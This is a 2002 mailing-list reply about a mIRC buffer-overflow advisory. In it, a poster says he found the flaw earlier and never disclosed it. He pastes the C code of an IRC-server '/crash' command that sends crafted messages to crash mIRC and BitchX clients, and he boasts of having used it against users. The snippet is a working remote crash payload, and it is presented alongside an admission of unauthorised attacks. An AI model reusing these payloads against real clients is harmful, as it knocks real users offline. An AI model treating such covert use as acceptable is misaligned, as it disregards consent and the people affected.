Re: mIRC Buffer Overflow

From: Syzop (syzat_private)
Date: Sun Feb 03 2002 - 10:22:35 PST

    Hi,

    David Dorgan wrote:

    > An error exists in mIRC's handling of certain messages from the server,
    > making it possible to overflow a static buffer. With carefully constructed
    > messages arbitary code can be executed.

    Just wanted to let you know I discovered this bug a year ago when
    I was brute forcing numerics (+random length arguments).
    However it didn't seem exploitable... guess I was wrong :/... (think my arguments
    were too small or something like that).
    Also another bug which was obviously a buffer overflow was fixed later in
    5.9 so I didn't pay attention anymore to this stuff.
    However I've been using my ircop /crash command for some time >:)
                            // bitchx crash
                            sendto_one(acptr, ":blah 004 blah :blah blah");
                            // mirc crash
                            sendto_one(acptr, ":blah 001 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
                                              "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
    Anyway, I didn't report it so it's your bug now :P.

    Cya,

        Syzop.

    PS: That bitchx bug is just because of a missing argument -> NULL pointer -> crash.